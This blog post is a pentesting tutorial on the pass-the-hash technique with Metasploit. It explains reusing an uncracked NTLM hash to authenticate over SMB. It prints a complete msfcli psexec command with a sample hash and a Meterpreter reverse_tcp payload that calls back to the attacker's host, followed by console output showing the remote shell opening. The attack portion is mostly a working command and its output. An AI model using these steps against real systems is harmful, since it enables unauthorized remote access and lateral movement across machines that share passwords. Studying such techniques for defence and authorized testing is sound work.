Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

Pass the Hash Attack with Metasploit

Windows systems usually store the NTLM hash right along with LM hash, where the NTLM hash being more secure. When a system is compromised with an Administrative or System level of access, an attacker will often take a copy of the password hashes for off-line hash-cracking. However, what if the passwords that have been chosen were very strong, and are not crackable in a realistic time-frame?

Sometimes we do not need to crack them. We can simply take the hash as-is and use it as a token to access the system. This technique is called “Pass the Hash”. The same password hashes can be used for authentication, either to the same previously compromised system or to other systems that share the same password.

For example:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd:::

Having found that the NTLM hash is not crackable in a reasonable time, by brute force or rainbow tables, we may abandon cracking the hash as unfeasible. However, we could reuse the password hash "as is" to re-authenticate to the Windows system using SMB. Metasploit has a cool tool "exploit/windows/smb/psexec" which authenticates using SMB, uploads and runs a payload. In the following example we use Meterpreter as the payload:

/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=443 RHOST=192.168.1.20 SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E


[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.32:443
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \CpdYVAFa.exe...
[*] Binding to 367abb81-9844-35f1 ad32-98f038001003:2.0@ncacn_np:192.168.1.20[\svcctl] ...
[*] Bound to 367abb81-9844-35f1 ad32-98f038001003:2.0@ncacn_np:192.168.1.20[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (eHIqItmA - "MhEHHIQNUFjnuuJarbnQlnIjpA")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (748544 bytes) to 192.168.1.20
[*] Closing service handle...
[*] Deleting \CpdYVAFa.exe...
[*] Meterpreter session 1 opened (192.168.1.32:443 -> 192.168.1.20:1090)


meterpreter >

This attack could be used against any system that has an account with the same password and port 445 open. You can watch the video tutorial below:

0 comments:

 
Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!